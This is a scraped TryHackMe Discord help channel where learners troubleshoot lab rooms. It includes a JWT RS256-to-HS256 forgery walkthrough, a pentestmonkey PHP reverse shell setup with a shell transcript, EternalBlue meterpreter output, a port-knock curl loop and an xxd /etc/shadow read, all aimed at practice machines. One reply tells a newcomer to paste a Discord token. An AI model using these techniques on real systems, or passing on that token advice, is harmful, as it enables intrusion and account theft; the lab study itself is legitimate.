#room-help

1 messages · Page 1 of 1 (latest)

pseudo finch
#

it was the pubkeys errring

#

Thank you

rotund hollyBOT
#

Gave +1 Rep to @analog heath (current: #1246 - 5)

pseudo finch
#

What are you using to connect to the vm? what region if i may ask worked for this ?

#

Any ideaas on how to finish seasurfer? i get kyle but on a fresh connection /proc is not mounted

analog heath
pseudo finch
#

he doesnt seem to open the ssh connection he is meant too and i cannot escalate

#

Can you try sea surfer for me rq?

analog heath
pseudo finch
#

Thank you

wraith turtle
#

Im connecting via OpenVPN

analog heath
wraith turtle
#

I want to connect to the machine in Virtulisation & Containers to carry out the task

main coral
#

Then enter the password tryhackme

wraith turtle
#

Same error

main coral
main coral
#

ssh -p 2222 thmuser@10.129.165.100

#

Or
ssh -p 2222 -o PreferredAuthentications=password thmuser@10.129.165.100

wraith turtle
#

Connection refused

main coral
#

use Attack box instead of OpenVPN Or change region and start machine again

wraith turtle
#

Trying Attackbox now. This should not be this difficult

#

Ive even tried to cheat with a walkthrough but the answers are wrong !

main coral
wraith turtle
#

ive restarted. diff IP address

main coral
#

Password: tryhackme

main coral
thin forum
#

Guys, what's the best way to run Kali Linux as a secondary OS? Like, using an external HDD or an external SSD?

wraith turtle
#

"Permission denied (publickey)

analog heath
main coral
#

then SSH password login is maybe disabled on that VM use

analog heath
main coral
main coral
rotund hollyBOT
#

Gave +1 Rep to @analog heath (current: #1091 - 6)

main coral
main coral
thin forum
main coral
#

the only tricky part is making sure you dont install kali on your main Windows drive

thin forum
analog heath
main coral
#

If budget is tight HDD is fine

analog heath
thin forum
#

Okay, I'll buy an external SSD then, thanks guys.

analog heath
#

@thin forum yeah but 128GB is also still very fine. if budget is low.

thin forum
analog heath
# thin forum But I think for now I won't use it so heavily.

never create live USB for this. it will break you USB firmware in about 6-10months. if you want then you can do it with SSD. and yeah you can dual boot it, like grub had a option - Kali or any other OS like arch or ubuntu. BUT may give you headache at first😅

thin forum
pseudo finch
analog heath
pseudo finch
#

also may add -o PubkeyAuthentication=no

analog heath
#

however SSD always wins in terms of SPEED compared to HDD

thin forum
#

Okay, I'll buy a 128GB SSD, it'll be much better.

#

Thanks bro

#

But if it's more expensive, I'll have to opt for the HD.

analog heath
#

may it stucks when you start many tools and softwares.

thin forum
#

So I'm going to invest in an SSD; I need good performance.

analog heath
#

i knew HDD problems and it's readwrite speeds. glitches. i also used it as external by adding a connector, and it slowd down much more. :'))

thin forum
#

Wow, I'm definitely going to buy the SSD.

#

Kkk

#

One last question, would a SATA or NVMe SSD be better?

analog heath
tiny sable
#

what i have to write here?

thin forum
#

I really need it, it's quite boring to use Kali every day.

analog heath
thin forum
#

Okay

analog heath
analog heath
wraith turtle
analog heath
wraith turtle
#

Cant get it working

#

@main coral has been trying to help

rose cipher
#

can i ask someting about the OSINT Level 3 iam stuck on a answer the i will have finished OSINT Level 3

rose cipher
# analog heath yes

this is the question i goton all the other question - A tweet that once referenced “coming soon” is now deleted. It’s still visible in an archived repost. Which verification strategy is used to validate what was originally said?-

#

i dont know if i dont see it or dont see the answer as i have done from level 1 -3 and this last question

near plinth
rose cipher
#

Thank you i just want for a walk came back and got the answer

near plinth
#

Okaay

rose cipher
#

But thank you for trying to help me

dim pagoda
#

Im trying to do the "cat pictures" room. Found the hint on the phpbb forum. Executed what i am supposed to do. Port 4420 opens up (which was previously closed) but port 21 stays closed. I think i should find a hint that i could use to the port 4420. Does anyone have a hint?

near plinth
dim pagoda
calm plume
#

guy could you help me with creating room?

bright hawk
#

Hello

https://tryhackme.com/room/catpictures

I have a problem with this room, after a few hours of trying and after I watched some write-ups and videos on youtube for this room, still the solution doesn't work. Do you have any idea if it's possible that it's a bug?
It should be an easy room but the provided solutions across the internet are not working.

any hint would be useful

Also i tried to do the knock using the open-proxy hint discovered in nmap scan like this:

for port in 1111 2222 3333 4444; do
    curl -s --max-time 1 --proxy http://10.112.161.75:8080 http://10.112.161.75:$port
    sleep 0.5
done

Thanks

bright hawk
urban elk
#

try port knocking?

bright hawk
#

Using knock package, using custom scripts, using Nmap. Port 21 remain filtred and closed

pseudo finch
#

I think some of the rooms are indeed just broken

gilded scaffold
#

They are

torn moss
#

can someone plz help me on mod 5 task 3? im on a chromebook and i dunno wtf lol

pseudo finch
#

on what what now?

fair ocean
#

hello i am currently trying to complete AD Basics and im trying to create the Auto Lock Screen group policy object but when i try to navigate to local policies within the editor several areas are missing in the security settings. i cant figure out what the hell im doing can anyone help me out please

gilded scaffold
lyric smelt
#

Good day, I am busy with the JWT Security room, I have been on it for days, stuck on example 5, I have read all walktrhoughs as well as watched the videos, when it comes to editing the /usr/lib/python3/dist-packages/jwt/algorithms.py, so I can comment from 143-146 this is all there is return default_algorithms
and from all the walkthrough and video guidance their is it shouldn't be like this, I tried with the Echo agent, it is not solving anything, I tried with other AI agents, and did troubleshoot but it wont run to give me the flag. from the token I get when you run the curl -H 'Content-Type: application/json' -X POST -d '{ "username" : "user", "password" : "password5" }' http://10.10.164.32/api/v1.0/example5 and got to jwt.io I edited the the alg from the "RS256" to "HS256" then the admin: 1, I copied the jwt and run the curl -H 'Authorization: Bearer [your JWT Token]' http://MyMachineIP/api/v1.0/example5?username=admin, but then it send the "message": "JWT could not be read: Signature verification failed"
from the instruction as followed it is not working for me to get the flag, please help as from the file I need to edit line 143 is not the same as everyone and I am fraustrated as I have gotten everyhting but not that flag

slim bison
# lyric smelt Good day, I am busy with the JWT Security room, I have been on it for days, stuc...
ms@Mac ~/Documents % curl -H 'Content-Type: application/json' -X POST -d '{ "username" : "user", "password" : "password5" }' http://10.64.xxx.217/api/v1.0/example5
{
  "public_key": "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDHSoarRoLvgAk4O41RE0w6lj2e7TDTbFk62WvIdJFo/aSLX/x9oc3PDqJ0Qu1x06/8PubQbCSLfWUyM7Dk0+irzb/VpWAurSh+hUvqQCkHmH9mrWpMqs5/L+rluglPEPhFwdL5yWk5kS7rZMZz7YaoYXwI7Ug4Es4iYbf6+UV0sudGwc3HrQ5uGUfOpmixUO0ZgTUWnrfMUpy2dFbZp7puQS6T8b5EJPpLY+iojMb/rbPB34NrvJKU1F84tfvY8xtg3HndTNPyNWp7EOsujKZIxKF5/RdW+Qf9jjBMvsbjfCo0LiNVjpotiLPVuslsEWun+LogxR+fxLiUehSBb8ip",
  "token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJ1c2VybmFtZSI6InVzZXIiLCJhZG1pbiI6MH0.kR4DjBkwFE9dzPNeiboHqkPhs52QQgaHcC2_UGCtJ3qo2uY-vANIC6qicdsfT37McWYauzm92xflspmSVvrvwXdC2DAL9blz3YRfUOcXJT03fVM7nGp8E7uWSBy9UESLQ6PBZ_c_dTUJhWg35K3d8Jao2czC0JGN3EQxhcCGtxJ1R7T9tzBMaqW-IRXfTCq3BOxVVF66ePEfvG7gdyjAnWrQFktRBIhU4LoYwem3UZ7PolFf0v2i6jpnRJzMpqd2c9oMHOjhCZpy_yJNl-1F_UBbAF1L-pn6SHBOFdIFt_IasJDVPr1Ybv75M26o8OBwUJ1KK_rwX41y5BCNGcks9Q"
}

ms@Mac ~/Documents % curl -H 'Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6InVzZXIiLCJhZG1pbiI6MX0.7jJBv<REDACTED>l0o7imBV0wa0HTDPRMavGbPyU' "http://10.64.xxx.217/api/v1.0/example5?username=admin"
{
  "message": "Welcome admin, you are an admin, here is your flag: THM{REDACTED}"
}

#

much easier to use jwt.io to edit the token, instead of modifying algorithms.py

  1. change to HS256
  2. change admin to 1
  3. Use public_key as the Secret and Sign JWT <--- My guess, you didn't do this step
crisp tangle
#

issue in reserve shell, I am in https://tryhackme.com/room/breakmenu room. I used cve20231874.py to get admin privilege. it worked. I added php reverse shell script as suggested in pentest monkey in theme function file after visiting to theme file editor. the script is as set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.162.7'; // CHANGE THIS
$port = 1234; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0; where 192.168.162.7 is my Internal virtual IP address given by tryhackme. the same is also display by using ip a | grep tun0 34: tun0: <POINTOPOINT,NOARP,UP,LOWER_UP> mtu 1380 qdisc noqueue state UP group default qlen 1000
inet 192.168.162.7/17 brd 192.168.255.255 scope global tun0
. i saved the edit theme file after inserting my php reverse shell script and opened a listener on a terminal in my machine by rlwrap -f . -r nc -nvlp 1234
listening on [any] 1234 ... . i visited dashboad, post or ant other page in given thm vulnerable wordpress breakmenu pages but didn't receive ant reverse shell on my terminal. Earleir THM provide vpn ip start from 10. x.x.x that was work ... can any one help me

lyric smelt
slim bison
#

copy-paste this into the Secret field on jwt.io JWT Encoder section : ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDHSoarRoLvgAk4O41RE0w6lj2e7TDTbFk62WvIdJFo/aSLX/x9oc3PDqJ0Qu1x06/8PubQbCSLfWUyM7Dk0+irzb/VpWAurSh+hUvqQCkHmH9mrWpMqs5/L+rluglPEPhFwdL5yWk5kS7rZMZz7YaoYXwI7Ug4Es4iYbf6+UV0sudGwc3HrQ5uGUfOpmixUO0ZgTUWnrfMUpy2dFbZp7puQS6T8b5EJPpLY+iojMb/rbPB34NrvJKU1F84tfvY8xtg3HndTNPyNWp7EOsujKZIxKF5/RdW+Qf9jjBMvsbjfCo0LiNVjpotiLPVuslsEWun+LogxR+fxLiUehSBb8ip

slim bison
slim bison
# crisp tangle issue in reserve shell, I am in https://tryhackme.com/room/breakmenu room. I ...

i can confirm this is working as expected (using my own machine over openvpn)- this is a great writeup that outlines the steps: https://0xb0b.gitbook.io/writeups/tryhackme/2024/breakme

key differences:

  1. Switched to 2021 Theme in Theme Editor
  2. Replaced 404.php with pentestmonkey
  3. in Terminal nc -lvnp 4444
  4. Nav to http://breakme.thm/wordpress/wp-content/themes/twentytwentyone/404.php to call revshell
ms@Mac ~/Documents % nc -lvn 4444                                                 
Linux Breakme 5.10.0-8-amd64 #1 SMP Debian 5.10.46-4 (2021-08-03) x86_64 GNU/Linux
 00:53:02 up  2:33,  0 users,  load average: 0.00, 0.09, 0.46
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (604): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Breakme:/$ whoami
whoami
www-data
www-data@Breakme:/$ hostname
hostname
Breakme
www-data@Breakme:/$ 
crisp tangle
slim bison
#

yes that is the new config, i have same and no issue, that is the "magic" of routing. THM changed their OpenVPN infrastructure so that your tun0 is on a 192.168.x.x network, and the OpenVPN server routes traffic between your tun0 and the target’s 10.x.x.x address space. You no longer need an IP in the same subnet because routing tables handle the connectivity.

---snip---
2026-03-22 17:46:34 /sbin/ifconfig utun9 192.168.xxx.x6 192.168.xxx.x6 netmask 255.255.128.0 mtu 1380 up
2026-03-22 17:46:34 /sbin/route add -net 192.168.128.0 192.168.xxx.x6 255.255.128.0
add net 192.168.128.0: gateway 192.168.xxx.x6
2026-03-22 17:46:34 /sbin/route add -net 10.64.0.0 192.168.128.1 255.240.0.0
add net 10.64.0.0: gateway 192.168.128.1

#

just run ip route to see for yourself:

ms@Mac ~/Documents % ip route                                                    
default via 192.168.0.1 dev en1
default dev bridge100 scope link
default dev bridge101 scope link
10.64.0.0/12 via 192.168.128.1 dev utun9
maiden gale
#

Hi can someone help me in one lap?

heady summit
#

you can just drop your question, someone will get to it eventually

maiden gale
#

Ok

#

I can't send photos?

#

Sorry im new here

heady summit
#

type "/verify" on any channel and paste your discord token when prompted. you'll find your token in your account details on tryhackme

maiden gale
#

Im i in public now?

near plinth
maiden gale
#

im now in Offensive Security Intro lap in task 3 its ask me to hack fake bank but i can't found the bank IP, so where can i find it?

main coral
#

Use the given IP Open it in browser http://<IP>

maiden gale
#

I found that my try hack me account need update

#

how can i update it?

main coral
#

screen shot pls

maiden gale
#

Can i dm u?

main coral
gentle sigil
#

I think the room Upload Vulnerabilities has a bug. Even after adding the ip and the hosts in the /etc/hosts, I can't be able to view the urls.

Please read the instructions in task one. You must access this server with one of the following virtual hosts:

    overwrite.uploadvulns.thm
    shell.uploadvulns.thm
    java.uploadvulns.thm
    annex.uploadvulns.thm
    magic.uploadvulns.thm
    jewel.uploadvulns.thm

Refer to the instructions in task one for more information

Anyone having the same issue?

TryHackMe

Tutorial room exploring some basic file-upload vulnerabilities in websites

urban elk
#

And they won't fix it.

#

So yeah.

proper lotus
#

Hello. So im trying to use use windows/meterpreter/reverse_tcp payload ( on metasploit as u can guess )

The handler and exploit works successfully i belive but after trying to execute the payload this happens:

10.129.181.154:455 - Executing the payload...
10.129.181.154:455 - Service start timed out, OK if running a command or non-service executable...
Exploit completed, but no session was created.

Why are sessions not being created sometimes?

proper lotus
grand harness
#

please anyone i need help with Azure:tapper

wild jasper
#

i am unable to connect with metasploit ip's machine in the room with attackbox for some reason i do not understand

#

can someone help me with this

#

please

#

I've also connected with the ovpn file

analog heath
main coral
rain stirrup
#

the yt video on the "Pre Security > Network Fundamentals > intro to LAN" module is in a different language, just wanted to confirm that it is for everyone lol

analog heath
rain stirrup
#

that's strange when i was on there originally there was no option for that and it was a different language, after closing browser and reloading it is now back to english lol not sure what happened but thank you!

rotund hollyBOT
#

Gave +1 Rep to @analog heath (current: #979 - 7)

sage fox
#

Do some of the rooms just have weird behavior or something? I've been stuck on the Active Directory room for a really long time, even with help from some of you here.

fair ocean
#

What was it you were struggling with on there

sage fox
#

Task 4: Managing Users with AD

I'm trying to log into Phillip's account using the THM virtual desktop.

slim bison
#

From Pinned Messages:
Everyone who is looking for help. Volunteers can and will refuse to help you if you are being ignorant and not detailing what your issue is.

What Room? (Link, Room title, room code from URL)
What Task? (Give the number!)
What question? (Number, maybe also basic details)
What have you tried?
What happened?
What didn't happen?
What did you expect to happen?
A picture paints a thousand words. Don't type a thousand words. Screenshots are awesome. Photos of your screen are not.

Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

vague sundial
#

Looking for help with frp??

analog heath
molten cloak
zenith sinew
zenith sinew
molten cloak
#

Could somebody please help me with this one? It's Burp Suite: The Basics, Site map, issue definitions, the Chellenge. Challeleng says: Take a look around the site on http://10.112.183.98/ — we will be using this a lot throughout the module. Visit every other page that is linked on the homepage, then check your sitemap — one endpoint should stand out as being very unusual!

Visit this in your browser (or use the "Response" section of the site map entry for that endpoint)
The question: What is the flag you receive after visiting the unusual endpoint?
There is no flag, no enpoint standing out, nothing unusal, no map

zenith sinew
fair ocean
molten cloak
#

yes

molten cloak
zenith sinew
#

I dont even remember this room but I know I did it somehow

molten cloak
#

The hint says: You are looking for a suspicious page with a name made up of a series of random letters and numbers

#

Ther is no page like that

analog heath
#

and the flag lies in it

#

check all pages, links. instead you can just see source code and click on every link.

zenith sinew
molten cloak
analog heath
molten cloak
#

ok

analog heath
#

@molten cloak click on every links, and objects, even the products and its buttons

zenith sinew
analog heath
molten cloak
zenith sinew
#

u surely can get in there

#

u just need to click on everything

analog heath
zenith sinew
#

found it too

analog heath
analog heath
#

@molten cloak click on every things, buttons like see more.

zenith sinew
#

then your flag will lay in there

molten cloak
zenith sinew
molten cloak
zenith sinew
molten cloak
#

Im not giving up, I just don't know the reason why it's not showing or what I do wrong

zenith sinew
analog heath
molten cloak
zenith sinew
analog heath
#

how did you connect your browser to burp?? with foxyproxy?

molten cloak
analog heath
molten cloak
#

ok

analog heath
molten cloak
#

I got this when openning Google

analog heath
analog heath
#

now click on every link or button or any image.

molten cloak
#

I clicked on products. Many times and no item is there

near plinth
analog heath
analog heath
#

okay now done!

molten cloak
analog heath
# molten cloak

see contact and support. fill them with random detail and send it. you will get your point.

molten cloak
#

ok

analog heath
#

@molten cloak do on both, contact and support!

molten cloak
#

ok, now the whole attackbox just stoped working a minute please

analog heath
#

i think now it's done. wlcm!

grand harness
#

Hi all could someone please help me with this room,
https://tryhackme.com/room/tapper
Task 2 - im having access issues for the account gumby. Im unable to assign the account to my authenticator app to sign in, i believe this is a bug on the room ive been attempting to access the account for over 3 weeks now checking daily.
Thank you

molten cloak
analog heath
analog heath
analog heath
molten cloak
#

Yes, I said I found it. Meaning, it's there

analog heath
#

finally you had done!.

molten cloak
#

Yes, but since I have no idea why and what actually happened I asked you to tell me what heppend

#

or direct me to some place on THM where it's explained

#

so I can, you know... learn something

analog heath
molten cloak
#

uhhh.. Ok

#

well, thanks for your help with this one!

slim bison
thick dune
fair meadow
#

hello im doing gobuster the bacis and this is the error i get sudo: unable to resolve host ip-10-112-80-74: Name or service not known

thick dune
fair meadow
#

i found a solution on reddit

#

add the ip to /etc/hosts

thick dune
#

yep

lucid gulch
#

Hey guys, how is the points stuff on tryhackme platform working? Last weak I studied 12 rooms and I got about 1200 points, so its about 100 points per room. This week I have been studied 4 rooms yet and I got 88 points so far for all 4 rooms together. (I would svear I had more points but suddenly I got demoted or something..) Are there some things for what I can get demoted my points?
...I just like the lederboad things 😄

near plinth
tribal saddle
#

Hello guys, im doing the Operation System Security Room, i need to try to find the Top 7 passwords and guess the Johnny's password, i have no idea how to do it, i cant find the top 7 passwords, any help pls ?

zenith sinew
#

Or a folder

tribal saddle
#

i dont find any

#

lol found it, not that easy for a begginer ngl

digital violet
#

Greetings all. New to THM and am currently taking part in the JR Pentester path. I am finding there are times the FFUF web fuzzer is not installed. In the most recent room I am working this was the case and I had to manually install. Am I doing something wrong here? The exercises say the app should already be installed. So I am just wondering if this is a normal occurrence?

slim bison
digital violet
slim bison
lyric smelt
rotund hollyBOT
#

Gave +1 Rep to @slim bison (current: #654 - 12)

fierce solstice
#

ok, i'll try and google how to do that

verbal plaza
#

Hi, so like I'm new to Linux. I use Virtual box for operate Linux, but I stumbled across a problem when I tried to attempt the meow question(the beginner question). When I tried to ping the given IP, it wasn't really doing the job or trying to enter the telnet service of that IP, I was getting session error messages. How can I fix it? I'm really new here.

main coral
near plinth
verbal plaza
near plinth
verbal plaza
#

Thank you all for the quick response. I will load in and finish my first challange soon.. 🙂

wraith turtle
#

Can anyone just give me the answers to Virtualisation and Containers task 6? I'm done messing about with things that won't work.

errant burrow
#

so did it work?

analog heath
wraith turtle
#

Yeah. I can't get into the server. Nothing works.

analog heath
analog heath
#

i'll be there to help you completing this task.

wraith turtle
#

I agree 💯%

analog heath
wraith turtle
analog heath
wraith turtle
analog heath
# wraith turtle

okay, now you can just type commands that are given in hints like kubectl get pods.

#

and all of your answers will be easy from now.

#

it's good to see Hints for this tasks.

#

if any issue occur, tell me.

wraith turtle
#

Thanks a lot

sour falcon
# errant burrow so did it work?

I'll have to get back to you later haha. Between the trouble I was having and then trying to figure out how to get Kali set up, I spent many many hours on the room which should take 20 minutes. When we had a break in the weather I decided to take a little mental break as well and get some work done in the garage. Diving back into learning today.

wraith turtle
errant burrow
shrewd brook
limpid hound
#

Hey everyone! 👋 I'm working on the Metamorphosis room and running into a weird issue.

I successfully pulled webapp.ini via rsync, changed env = dev, and uploaded it back. The /admin/index.php page now loads fine. However, whenever I submit any username (even just 'tom') or try to run sqlmap, I instantly get a 500 Internal Server Error from config.php.

I've already verified the uploaded file with cat -A to ensure it has correct Linux line endings ($ only, no ^M$ CRLF issues) and no extra spaces. I also restarted the machine just in case the backend MySQL crashed, but the 500 error persists.

Has anyone else experienced this? Is there a specific trick to formatting the .ini file that I'm missing, or is the box acting up? Any hints would be appreciated!

fast elm
#

The "Breaching AD" room/network on the Red Teaming path is in need of a reset

#

Consistently trying to access ntlmauth.za.tryhackme.com with my browser after setting up DNS and confirming I can reach the site, as well as completing the password spray and confirming that can reach the site, but nothing works to access the site.

analog heath
fast elm
analog heath
fast elm
#

I think I found my problem. Thanks anyway.

sour falcon
rotund hollyBOT
#

Gave +1 Rep to @errant burrow (current: #2400 - 2)

untold jewel
#

Hello all. I’m a noob with 0 experience. lol
Looking to create mod menus and simple UI for single player games. Or am I in the wrong place?

round jetty
idle sage
#

If the goal was to teach SOC skills, congratulations, you taught frustration, not analysis

#

The fake flag in the SOC L1 Alert Reporting task feels misleading. Was it designed like that?

untold jewel
untold jewel
#

Then why do games incorporate mods into their game or allow people to create them in a game?

round jetty
#

It's against the terms of service for this platform to discuss it

untold jewel
#

Ohhhhh… sorry. I catch your drift now.

burnt orbit
#

Hi all, I'm trying to do the shadow trace room in the soc lvl 1 pathway... does anyone else have issues with the vm being completely unusable? I've terminated and restarted 3 times and each time it crashes after about 30 seconds!

idle sage
idle sage
idle sage
idle sage
burnt orbit
burnt orbit
# idle sage Task 4

What flag did you receive after correctly escalating the alert from the previous task to L2?

is it that question?

idle sage
burnt orbit
idle sage
burnt orbit
idle sage
burnt orbit
burnt orbit
idle sage
burnt orbit
burnt orbit
idle sage
#

Thanks

#

And I would have helped with your problem, but sadly, I don't have the answers as well. So sorry.

burnt orbit
plain tendon
#

I'm having some issues with the Gobuster: The Basics room. I finally managed to force my Kali to use the right address, I had to add it to /etc/hosts, but it gives me this error:
[ERROR] error on word aag: lookup aag.offensivetools.thm. on 10.65.165.212:53: server misbehaving I know I'm not using the correct wordlist but I do not have the same wordlist from the AttackBox on my Kali VM. I can ping the maching just well, so the VPN works fine. If I try to reach it through a browser I get a Forbidden error. Not too sure why it doesn't work, it also doesn't work for me when using the AttackBox on THM's website, even when I follow the instructions to the letter.

#

I managed to get the dir task working by using the IP address intead of the domain, but the dns task doesn't work at all

near plinth
rotund reef
#

Hi everyone, I'm new to TryHackMe and I'm currently stuck on Task 8 in the 'File Inclusion' room. I've been trying to find the solution but I'm having a hard time getting it right. Could someone please give me a hint or point me in the right direction? Thanks a lot!

slim bison
austere niche
#

Hey guys I think I found an issue in Linux Shells room in the Cyber Security 101 room?? I'm trying to work through some paths and the material does not match what I'm supposed to and the directory I"m supposed to go into does not exist

#

I mean I could probably complete the room but idk I like following along in the shell to like learn as I go and I was like uuuuuuh

rotund hollyBOT
#

Gave +1 Rep to @austere niche (current: #3698 - 1)

austere niche
austere niche
#

ope thanks still figuring out all the rooms here

slim bison
austere niche
#

rip it's been there since October

signal vector
#

Hi, I am in the Upload Vulnerabilities room. I've followed the necessary instructions of adding the appropriate line in the hosts file. When I go over to overwrite.uploadvulns.thm/, I get the following:
"Please read the instructions in task one..."

I believe the vhosts have had enough time to get up and running but all the domains give the same 'error'.

#

Could this have something to do with using a NAT configuration instead of a bridged adapter in my virtualbox VM settings?

neat glen
#

Hey there! I need some help regarding one room. I am currently at OWASP Top 10 2025: Application Design Flaws (https://tryhackme.com/room/owasptopten2025two), trying to complete the AS06: Insecure Design part (Task 5) , but I got stuck and could use some guidance. The room talks about bad logic designs or architecture that can compromise an app, and gave me an example from the Clubhouse app (https://www.networkintelligence.ai/blogs/vulnerabilities-and-privacy-issues-with-clubhouse-app/). I get the Challenge "Navigate to [IP_ADDR]. Have they assumed that only mobile devices can access it?", but nothing stands out. It's just a page with nothing special in the source code. Even if I use burp to edit the request headers and modify the User-Agent to mimic a mobile device, I still get nothing different from the basic request. Any suggestions?

main coral
upbeat oracle
#

I am facing the exact same issue. Windows Network Analysis room Task 5. Both VMs boot but getting status code 500 "Internal Server Error" at step 5.

Followed suggestions from @main coral to no avail. Still get 500 error. Is there a solution for this issue?

main coral
upbeat oracle
main coral
runic ice
#

Hello! Hoping to find some help with the Room Custom Tooling using Burp. I am struggling with getting the "SECOND_VM_IP". I started the target VM, then the AttackBox. They say "You can find and start the second VM from this room(which is a link). We will use the IP address of the second VM as SECOND_VM_IP in this room." When I go to that room it tells me the VM is not in my region. Anyone else run into this? Thanks!

minor skiff
#

I am having issues loading the Windows network in the Lateral Movement and Pivoting lab. When I hit start the network just loads up forever. I started the lab yesterday and it’s still loading up the network 24 hours later

plain tendon
# near plinth Can you send a screenshot of your etc/hosts?

10.65.162.55 offensivetools.thm 127.0.0.1 localhost 127.0.1.1 kali ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes ff02::2 ip6-allrouters

This is my hosts. So now it seems to be working better I didn't change anything aside from re-launching the machine. The AttackBox works now even though it didn't earlier. I also downloaded the wordlist to my computer but I don't get any hits on my machine and I was getting hits on the AttackBox. I use the command: gobuster dns -do offensivetools.thm -w /usr/share/wordlists/subdomains-top1million-5000.txt Notice that I use -do instead of -d because on the verion of gobuster that I have on the Kali image, -d is for delays not the domain name.

flint valley
#

hello could somone help me with ctf?

analog heath
slow canyon
#

FIX THE " Gobuster the basics" ROOM PLEASE!!!!!

analog heath
slow canyon
#

the url is not working "offensivetools.thm"
I changed the vbox multiple times then it worked

#

Everyone is having an issue with this room I think it needs to be fixed

flint valley
analog heath
flint valley
#

i checked the write up and i found anwser but i was confused for 4hours

#

because i was working on it with chat ghpt

analog heath
flint valley
#

ye like when i found cve i didint know how to use it against the app

analog heath
flint valley
#

ye i wanted to exploit it and told it to chat gpt and he told me that its not my level to exploitations instead of this i should look for solutions on site// ill not longer will suggest by chatgpt i guess

analog heath
analog heath
flint valley
#

can i dm you cus i cant upload photos here

analog heath
ashen crane
dull apexBOT
jolly hill
#

hy

analog heath
#

yep

jolly hill
#

I'm having trouble with Exercise 3 "javascript"

#

Even when I enter JSISFUN, I keep getting an error

analog heath
jolly hill
#

y

analog heath
jolly hill
#

3

#

I've refreshed the page several times and entered the code correctly, but it won't let me continue

analog heath
jolly hill
#

Click the "View Site" button on this task. On the right-hand side, add JavaScript that changes the demo element's content to "Hack the Planet"

#

I've tried this several times and I've entered the information, but it keeps telling me, “There was a problem, please try again later.”

analog heath
jolly hill
analog heath
jolly hill
#

I don't understand why I can't upload images to Support

analog heath
jolly hill
analog heath
# jolly hill

this is How websites work room. and your answer is completely correct.

#

@jolly hill try to log out your account, and login back. and see if it works

jolly hill
#

ok thx !

brittle delta
#

dms @unborn anvil

toxic chasm
#

hi

jade orchid
#

Hi everyone, i have a issue with Res challange. xxd binary does not have the SUID bit setted. I restarted three time the target machine but the issue persists.

www-data@ip-10-114-175-93:/var/www/html$ ls -l /usr/bin/xxd 
-rwxr-xr-x 1 root root 18712 Apr  2  2025 /usr/bin/xxd
www-data@ip-10-114-175-93:/var/www/html$ xxd /etc/shadow | xxd -r
xxd: /etc/shadow: Permission denied
vagrant fern
slim bison
peak veldt
#

I'm on Upload Vulnerabilities room and it keeps telling me the only two pages that im suppose to have access to im not having access to so i cant finish my task.

#

so many broken labs

#

nevermind i forgot to use the -x to search for filenames and just manually went to magic.uploadvulns.thm/assets/shell.php to get the reverse shell

bronze etherBOT
#

@storm drift Please slow down. Further spam will result in a short timeout.

storm drift
peak veldt
#

are you scanning the right ip? i remember having to close the target and attack machine on that one because it bugged out

analog heath
#

@storm drift because eternalblue works on Windows, not linux.

#

see Target IP of your metasploitexploitation room, and scan it with nmap. and show me screenshot.

analog heath
# storm drift

it is not working because you are scanning a Linux machine with windows exploit.

slim bison
# storm drift is `Exploitation` Task in room https://tryhackme.com/room/metasploitexploitation...

just verified its working from my machine but does not follow the instructions given in the task precisely

i used this payload
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

[*] 10.65.170.244:445 - Trying exploit with 17 Groom Allocations.
[*] 10.65.170.244:445 - Sending all but last fragment of exploit packet
[*] 10.65.170.244:445 - Starting non-paged pool grooming
[+] 10.65.170.244:445 - Sending SMBv2 buffers
[+] 10.65.170.244:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.65.170.244:445 - Sending final SMBv2 buffers.
[*] 10.65.170.244:445 - Sending last fragment of exploit packet!
[*] 10.65.170.244:445 - Receiving response from exploit packet
[+] 10.65.170.244:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.65.170.244:445 - Sending egg to corrupted connection.
[*] 10.65.170.244:445 - Triggering free of corrupted buffer.
[*] Sending stage (232006 bytes) to 10.65.170.244
[*] Meterpreter session 1 opened (192.168.145.206:4444 -> 10.65.170.244:49353) at 2026-03-25 23:00:40 -0700
[+] 10.65.170.244:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.65.170.244:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.65.170.244:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > 
analog heath
slim bison
# analog heath maybe he's scanning his own IP. because that nmap result shows Ubuntu machine.

agreed plus needs the correct options:

msf exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         10.65.170.244    yes       The target host(s), see https://docs.metasploit.com/docs/using-metaspl
                                             oit/basics/using-metasploit.html
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects
                                             Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target
                                             machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Wind
                                             ows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target mach
                                             ines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server
                                              2008 R2, Windows 7, Windows Embedded Standard 

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
